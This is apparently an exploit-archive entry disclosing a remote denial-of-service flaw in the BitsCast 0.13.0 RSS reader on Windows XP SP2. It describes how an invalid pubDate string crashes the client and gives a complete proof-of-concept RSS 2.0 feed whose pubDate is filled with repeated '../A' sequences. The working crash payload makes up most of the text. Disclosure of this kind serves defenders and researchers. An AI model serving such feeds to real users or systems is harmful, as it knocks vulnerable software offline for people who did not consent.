BitsCast version 0.13.0 remote denial of service exploit.
98f5592bddc7cfcf0f53a11aca5378a1392f7a0a5db0e06b890303e5dc32e92e
BitsCast 0.13.0 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2
BitsCast crashes when receiving a RSS 2.0 feed item with a invalid string* in sub-element
'pubDate'.
* '../A' x 8, 'A/../' x 8, and others.
PoC:
<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>Test</title>
<link></link>
<description></description>
<item>
<title>Remote DoS PoC</title>
<link></link>
<description></description>
<pubDate>../A../A../A../A../A../A../A../A../A../A../A../A</pubDate>
</item>
</channel>
</rss>